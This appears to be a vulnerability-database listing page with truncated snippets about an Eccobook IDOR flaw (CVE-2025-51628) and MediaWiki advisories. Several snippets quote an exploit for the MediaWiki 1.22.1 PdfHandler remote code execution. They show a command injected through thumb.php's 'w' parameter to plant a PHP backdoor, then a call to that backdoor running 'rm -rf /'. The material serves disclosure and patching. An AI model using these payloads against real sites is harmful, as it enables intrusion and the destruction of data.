EUVD-2025-23639

Malicious code in bioql PyPI...

CVE-2025-51628

Insecure Direct Object Reference IDOR vulnerability in PdfHandler component in Agenzia Impresa Eccobook v2.81.1 and below allows unauthenticated attackers to read confidential documents via the DocumentoId parameter...

CVE-2025-51628

Insecure Direct Object Reference IDOR vulnerability in PdfHandler component in Agenzia Impresa Eccobook v2.81.1 and below allows unauthenticated attackers to read confidential documents via the DocumentoId parameter...

CVE-2025-51628

Insecure Direct Object Reference IDOR vulnerability in PdfHandler component in Agenzia Impresa Eccobook v2.81.1 and below allows unauthenticated attackers to read confidential documents via the DocumentoId parameter...

Agenzia Impresa EccoBook 安全漏洞

Agenzia Impresa EccoBook is a ledger software from Agenzia Impresa, Italy. A security vulnerability exists in Agenzia Impresa Eccobook v2.81.1 and earlier versions, which stems from an insecure direct object reference in the PdfHandler component that could lead to the reading of confidential...

CVE-2025-51628

The CVE-2025-51628 vulnerability affects the PdfHandler component in Agenzia Impresa Eccobook versions up to 2.81.1 (and prior to 2.81.2). It is an insecure direct object reference (IDOR) that allows unauthenticated attackers to read confidential documents by supplying a DocumentoId parameter. Th...

CVE-2025-51628

Insecure Direct Object Reference IDOR vulnerability in PdfHandler component in Agenzia Impresa Eccobook v2.81.1 and below allows unauthenticated attackers to read confidential documents via the DocumentoId parameter...

Fedora 29 : mediawiki (2018-f4b65fc7cd)

https://www.mediawiki.org/wiki/Releasenotes/1.29MediaWiki1.29.3 - T169545, CVE-2018-0503 SECURITY: $wgRateLimits entry for 'user' overrides 'newbie'. - T194605, CVE-2018-0505 SECURITY: BotPasswords can bypass CentralAuth's account lock. - T180551 Fix LanguageSrTest for language converter - T18055...

Fedora 28 : mediawiki (2018-e022ecbc52)

https://www.mediawiki.org/wiki/Releasenotes/1.29MediaWiki1.29.3 - T169545, CVE-2018-0503 SECURITY: $wgRateLimits entry for 'user' overrides 'newbie'. - T194605, CVE-2018-0505 SECURITY: BotPasswords can bypass CentralAuth's account lock. - T180551 Fix LanguageSrTest for language converter - T18055...

Fedora 27 : mediawiki (2018-edf90410ea)

https://www.mediawiki.org/wiki/Releasenotes/1.29MediaWiki1.29.3 - T169545, CVE-2018-0503 SECURITY: $wgRateLimits entry for 'user' overrides 'newbie'. - T194605, CVE-2018-0505 SECURITY: BotPasswords can bypass CentralAuth's account lock. - T180551 Fix LanguageSrTest for language converter - T18055...

Debian DSA-2891-1 : mediawiki, mediawiki-extensions Multiple Vulnerabilities

The remote Debian host is missing a security update. It is, therefore, affected by multiple vulnerabilities in MediaWiki : - A cross-site scripting XSS vulnerability exists due to a failure to validate input before returning it to the user. An unauthenticated, remote attacker can exploit this, vi...

MediaWiki thumb.php 'w' Parameter Remote Shell Command Injection

The version of MediaWiki running on the remote host is affected by a remote command injection vulnerability due to a failure to properly sanitize user-supplied input to the 'w' parameter in the 'thumb.php' script. A remote, unauthenticated attacker can exploit this issue to execute arbitrary...

MediaWiki 1.22.1 PdfHandler Remote Code Execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 MediaWiki images/xnz.php 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! Related files: thumb.php -- extract all GET array to params /extensions/PdfHandler/PdfHandlerbody.php --...

MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit

Exploit for multiple platform in category web applications MediaWiki images/xnz.php 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! Related files: thumb.php -- extract all GET array to params...

MediaWiki <= 1.22.1 PdfHandler Remote Code Execution Exploit

Exploit for multiple platform in category web applications Exploit: 1. upload Longcat.pdf to wikimedia cms site with PDF Handler enabled http://vulnerable-site/index.php/Special:Upload 2. inject os cmd to upload a php-backdoor http://vulnerable-site/thumb.php?f=Longcat.pdf&w=10|echo%20...

MediaWiki 1.22.1 PdfHandler - Remote Code Execution

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 MediaWiki images/xnz.php 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! Related files: thumb.php -- extract all GET array to params /extensions/PdfHandler/PdfHandlerbody.php --...

MediaWiki 1.22.1 PdfHandler - Remote Code Execution

MediaWiki 1.22.1 PdfHandler - Remote Code Execution -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 MediaWiki images/xnz.php 3. access to php-backdoor! http://vulnerable-site/images/xnz.php?1=rm%20-rf%20%2f%20--no-preserve-root 4. happy pwning!! Related files: thumb.php -- extract all GET array to...

MediaWiki < 1.19.11 / 1.21.5 / 1.22.2 Multiple Remote Code Execution Vulnerabilities

According to its version number, the instance of MediaWiki running on the remote host is affected by the following remote code execution vulnerabilities : - A user-input validation error exists during thumbnail generation in the 'thumb.php' script that allows the execution of arbitrary shell...

MediaWiki Remote Code Execution vulnerability leaves Wikipedia open for Cyber attacks

The Encyclopedia giant WIKIPEDIA has been found vulnerable to remote code execution because of a critical flaw in the MediaWiki software. Wikipedia is a name which has become a major source of information for all of us. It has webpages on almost every topic you need to search. This giant is power...